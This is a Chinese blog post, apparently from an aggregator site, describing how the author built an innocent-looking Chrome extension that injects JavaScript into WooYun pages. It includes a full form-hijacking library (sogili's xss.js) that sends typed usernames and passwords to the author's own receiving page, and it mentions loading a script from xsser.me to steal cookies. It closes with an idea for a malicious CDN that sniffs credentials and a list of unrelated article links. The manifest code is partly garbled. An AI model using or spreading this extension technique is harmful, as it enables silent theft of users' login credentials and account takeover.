利用Chrome插件向指定页面植入js,劫持 XSS
- 利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践
- 0x00 Chrome插件
--------------------------
这个想法是昨天看到@紫梦芊 的帖子想起来的。
想法如下:
Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在所有乌云的页面里<script src=//xsser.me></script>呢?
于是,开始实践。(为了方便,只是弹了一个小框框)。
Manifest.json内容:123456789101112131415{"name":"XiaoChaJian","version":"1.0","manifest_version": 2,"author":"VIP","icons": {"128":"icon.png"},"permissions": [],"content_scripts": []}contentscript.js内容:
alert(/xss/);
那么,将弹框换成xsser.me,是不是就能截获想要的cookies了呢?
很遗憾,这种方法在乌云无效,因为乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟一样),但是很麻烦,于是,又有一个猥琐的想法诞生了:在乌云的登录页面中,插入@Sogili的xss.js来劫持表单,是不是就能把用户名和密码发送到我们想要的地方去了呢?
开始实践:
Manifest.json内容:123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232{"name":"JieChiBiaoDan","version":"1.0","manifest_version": 2,"author":"VIP","icons": {"128":"icon.png"},"permissions": [],"content_scripts": [{"js":["contentscript.js"],"matches":]}contentscript.js内容:;;varxss =function(){varx = {'name':'xss.js','version':'0.2.1','author':'长短短(sogili)'};x.x=function(id){returndocument.getElementById(id)};//容错取值x.e=function(_){try{returneval('('+_+')')}catch(e){return''}};//浏览器x.i={i:!!self.ActiveXObject&&(function(){for(varv=6,s=document.createElement('s');s.innerHTML='<![if gt IE '+(v++)+']><i></i><![endif]-->',s.getElementsByTagName('i')[0];);returnv;}()),c:!!self.chrome,f:self.mozPaintCount>-1,o:!!self.opera,s:!self.chrome&&!!self.WebKitPoint};//UAx.ua = navigator.userAgent;//判断是否为苹果手持设备x.apple=/ip(one|ad|od)/i.test(x.ua);//随机数x.rdm=function(){return~~(Math.random()*1e5)};//url编码(UTF8)x.ec=encodeURIComponent;x.html=function(){returndocument.getElementsByTagName('html')[0]||document.write('<html>')||document.getElementsByTagName('html')[0];};/** 销毁一个元素*/x.kill=function(e){e.parentElement.removeChild(e);};/**绑定事件*/x.bind=function(e,name,fn){e.addEventListener?e.addEventListener(name,fn,false):e.attachEvent("on"+name,fn);};/** dom准备完毕时执行函数*/x.ready=function(fn){if(!x.i.i){x.bind(document,'DOMContentLoaded',fn);}else{vars = setInterval(function(){try{document.body.doScroll('left');clearInterval(s);fn();}catch(e){}},4);}}/** 同源检测*/x.o=function(url){varlink = x.dom('<a href="'+encodeURI(url)+'">',1);returnlink.protocol+link.hoatname+':'+(link.port||80)==location.protocol+location.hoatname+':'+(location.port||80);};/** html to dom*/x.dom=function(html,gcsec){vartmp = document.createElement('span');tmp.innerHTML=html;vare = tmp.children[0];e.style.display='none';x.html().appendChild(e);gcsec>>0>0&&setTimeout(function(){x.kill(e);},gcsec*1000);returne;};/** ajax*/x.ajax=function(url,params,callback){(paramsinstanceofFunction)&&(callback=params,params=void(0));varXHR = (!x.o(url)&&window.XDomainRequest)||window.XMLHttpRequest||(function(){returnnewActiveXObject('MSXML2.XMLHTTP')});varxhr =newXHR();xhr.open(params?'post':'get',url);xhr.withCredentials =true;try{params&&xhr.setRequestHeader('content-type','application/x-www-form-urlencoded');}catch(e){}callback&&(xhr.onreadystatechange =function() {(this.readyState == 4 && ((this.status >= 200&&this.status <= 300) ||this.status == 304))&&callback.apply(this,arguments);});xhr.send(params);};/** CSRF*/x.csrf=function(url,params,callback){(paramsinstanceofFunction)&&(callback=params,params=void(0));if(params){varform = x.dom('<form method=post>');form.action=url;for(varnameinparams){varinput = document.createElement('input');input.name=name;input.value=params[name];form.appendChild(input);}variframe = x.dom('<iframe sandboxname=_'+x.rdm()+'_>',6);callback&&setTimeout(function(){x.bind(iframe,'load',callback);},30);form.target=iframe.name;form.submit();}else{varimg =newImage();callback&&(img.onerror=callback);img.src=url;}};/** 表单劫持*/x.xform=function(form,action){form.old_action=form.action,form.old_target=form.target,form.action=action;variframe = x.dom('<iframe name=_'+x.rdm()+'_>');form.target=iframe.name;setTimeout(function(){x.bind(iframe,'load',function(){form.action=form.old_action,form.target=form.old_target,form.onsubmit=null,form.submit();});},30);};/** 函数代理*/x.proxy=function(fn,before,after){returnfunction(){before&&before.apply(this,arguments);varresult = fn.apply(this,arguments);after&&after.apply(this,arguments);returnresult;}};returnx;}();http://vip.yupage.com/wy.php是我做好的一个接收页面,代码如下:

开始测试,打开登录页,填好用户名密码验证码,点击登录,首先会像我的接收页发起POST,然后才会POST乌云。

再去看看,用户名密码已经躺在那里了。

在不知情的情况下,用户名和密码就这样被劫持走了。乌云的wb转账功能可是没有二次验证的哦。
0x01 CDN
---------------
现在有许许多多的网站使用了CDN来进行加速/防D等。
去搜索了下CDN的工作原理,大概是这样的。
用户访问-》自动分配最快的节点-》请求原服务器-------
返回给用户《-返回给节点服务器《-原服务器返回数据<-|
那么,能不能搭建一台恶意的CDN,然后嗅探所有使用了该CDN的网站的用户名密码呢?
利用Chrome插件向指定页面植入js,劫持 XSS的更多相关文章
- 前端性能优化之利用 Chrome Dev Tools 进行页面性能分析
背景 我们经常使用 Chrome Dev Tools 来开发调试,但是很少知道怎么利用它来分析页面性能,这篇文章,我将详细说明怎样利用 Chrome Dev Tools 进行页面性能分析及性能报告数据 ...
- 利用chrome插件批量读取浏览器页面内容并写入数据库
试想一下,如果每天要收集100页网页数据甚至更多.如果采用人工收集会吐血,用程序去收集也就成为一个不二的选择.首先肯定会想到说用java.php.C#等高级语言,但这偏偏又有个登陆和验证码,搞到无所适 ...
- Chrome插件触发web页面的事件
Chrome插件中不能直接调用Web页面的元素js,原因是chrome插件的机制http://stackoverflow.com/questions/17819344/triggering-a-cli ...
- chrome插件访问原始页面的变量
开发chrome插件时遇到需要获取原始网页中的一个js变量的值问题.由于content.js和原始网页的作用域环境不同,无法直接获取变量的值,提示undefined.谷歌找到大神提供的办法.综合起来记 ...
- Windows下利用Chrome调试IOS设备页面
本文介绍如何在 Windows 系统中连接 iOS设备 并对 Web 页面进行真机调试 必须前提 iOS设备.数据线 Node.js 环境 Chrome 浏览器 环境准备 安装Node环境 参考Nod ...
- 利用Google Chrome开发插件,在网页中植入js代码
Google Chrome是一个很强大的浏览器,提供了各种各样的插件,大大提升了使用了的效率,比如vimium.honx等. Google在提供这些插件的同时还允许用户开发自己的插件. 最近在写js的 ...
- Chrome插件(Extensions)开发攻略
本文将从个人经验出发,讲述为什么需要Chrome插件,如何开发,如何调试,到哪里找资料,会遇到怎样的问题以及如何解决等,同时给出一个个人认为的比较典型的例子——获取网页内容,和服务器交互,再把信息反馈 ...
- 【干货】Chrome插件(扩展)开发全攻略(不点进来看看你肯定后悔)
写在前面 我花了将近一个多月的时间断断续续写下这篇博文,并精心写下完整demo,写博客的辛苦大家懂的,所以转载务必保留出处.本文所有涉及到的大部分代码均在这个demo里面:https://github ...
- 【干货】Chrome插件(扩展)开发全攻略
写在前面 我花了将近一个多月的时间断断续续写下这篇博文,并精心写下完整demo,写博客的辛苦大家懂的,所以转载务必保留出处.本文所有涉及到的大部分代码均在这个demo里面:https://github ...
随机推荐
- IOS之UI--小实例项目--综合使用
前言: 本博文是基于前一个小实例项目:IOS之UI--小实例项目--添加商品和商品名 进行继续综合学习积累的. 内容大纲 01-综合使用01-plist的使用 02-综合使用02-模型取代字典的好处分 ...
- Android 之 2048 的游戏逻辑分析
继续学习了极客学院的实战路径课程,讲到了2048游戏的编写过程,我在这里作个总结分享给大家(结果会附源代码和我改写后的代码): 这里主要包括两个方面:1.2048界面的绘制 2.2048算法逻辑的 ...
- javascript 构造函数方式定义对象
javascript是动态语言,可以在运行时给对象添加属性,也可以给对象删除(delete)属性 <html> <head> <script type="tex ...
- Html5如何使我们开发出来的应用或页面大小能适合各种高端手机使用
本文简介:1.手机移动端页面的自适应2.手机触摸手动滑动效果 一.header信息的设置(自适应) 1.声明信息 <!DOCTYPE HTML> 2.编码设置 <meta chars ...
- nyoj 42 一笔画问题 欧拉路径
题目链接:http://acm.nyist.net/JudgeOnline/problem.php?pid=42 欧拉回路,欧拉路径水题~ 代码: #include "stdio.h&quo ...
- spring ioc DI 理解
下面是我从网上找来的一些大牛对spring ioc和DI的理解,希望也能让你对Spring ioc和DI的设计思想有更进一步的认识. 一.分享Iteye的开涛对Ioc的精彩讲解 Ioc—Inversi ...
- 虚拟机centos6.5 --设置主机名
vi /etc/sysconfig/network #修改HOSTNAME后面的值,机器名 vi /etc/hosts #设置ip和机器名的对应关系 192.168.12.232 master 192 ...
- hadoop debug script
A Hadoop job may consist of many map tasks and reduce tasks. Therefore, debugging a Hadoop job is of ...
- 《致命接触》:人畜共患传染病的故事,SARS一章非常精彩,四星推荐
讲人畜共患的传染病的故事:亨德拉.埃博拉.疟疾.SARS.Q热.鹦鹉热.莱姆病.艾滋病等.作者比较会讲故事,又熟悉病毒传播相关的各种学科的知识(病毒学.生态学,还有一些我没记住的相关小学科),能把相关 ...
- Dev C++支持c++11标准的编译方法
一开始学C++的时候老师推荐的就是Dev C++这个IDE,用起来感觉还不错,使用起来比较简单,而且属于比较轻量级的,不怎么占用内存:缺点可能就是调试功能没有项VS那种大型IDE齐全和好用,不过对于一 ...
我要投稿